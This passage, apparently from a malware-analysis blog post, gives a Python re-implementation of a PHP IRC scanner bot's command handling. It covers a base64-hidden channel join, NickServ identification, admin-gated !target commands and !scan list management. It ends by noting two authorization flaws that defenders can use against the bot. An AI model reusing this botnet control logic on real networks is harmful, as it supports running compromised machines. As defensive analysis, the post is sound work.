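        d_command = line[off_a + 1:off_b] if off_b >= 0 else line[off_a + 1:]   # e.g. "PRIVMSG #chan"
        d_nick = line[1:off_c] if 0 < off_c < off_a else d_from
        i_text = line[off_b + 2:] if off_b >= 0 else ""
        return {"from": d_from, "nick": d_nick, "command": d_command,
                "text": i_text, "com": line.split(" ")}   # $com: the raw line split on spaces

    def status(self, nick):
        return self.auth.get(nick, {}).get("status", "")

    def handle(self, line):
        """Return the lines the bot would send in response to one server line."""
        p = self.parse(line)
        if p is None:
            return []
        numeric = p["command"][:3]
        if numeric == "004":                   # registered: identify, hidden join, greet admin, join
            out = [f"PRIVMSG nickserv :identify {self.nick} {self.identify}",
                   base64.b64decode(JOIN_B64).decode(),
                   f"NOTICE {self.admin} :Hai Boss!"]
            out.extend(f"JOIN {c}" for c in self.channels)
            return out
        if numeric == "433":                   # nick in use; the PHP picks another at random
            self.nick = self.nicklist[(self.nicklist.index(self.nick) + 1) % len(self.nicklist)]
            return [f"NICK {self.nick}"]
        dcom = p["command"].split(" ")
        com, nick = p["com"], p["nick"]
        if dcom[0] != "PRIVMSG" or len(com) < 4:
            return []
        target = dcom[1] if len(dcom) > 1 and dcom[1].startswith("#") else nick
        arg = com[4] if len(com) > 4 else ""
        if com[3] == ":!target" and self.status(nick) == "Admin":
            if arg == "clear":
                self.targetlist = []
                return [f"PRIVMSG {nick} :Target list cleared"]
            if arg == "total":
                return [f"PRIVMSG {nick} :Total Target Internal: {len(self.targetlist)}"]
        if com[3] == ":!scan" and arg == "add" and len(com) > 5:
            trigger = " ".join(com[5:])        # no authorization check at all in the PHP
            if trigger not in self.scanlist:
                self.scanlist.append(trigger)
                return [f"PRIVMSG {target} :{trigger} added"]
            return [f"NOTICE {nick} :{trigger} already present"]
        if com[3] == ":!scan" and arg == "del" and len(com) > 5 and self.status(nick) != "User":
            # mirrors the PHP: an unknown nick has no status, so it passes a `!= "User"` check too
            trigger = " ".join(com[5:])
            if trigger in self.scanlist:
                self.scanlist.remove(trigger)
                return [f"PRIVMSG {target} :{trigger} removed"]
        return []
```

Feeding it a PRIVMSG from a nick that is not in the auth table shows the two weak spots a defender can use: !scan add needs no authorization, and the `!= "User"` gate on !scan del (and on !psy in PHPSpyScanBot) lets an unknown nick through because its status is simply undefined.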

See you at the next post.. :)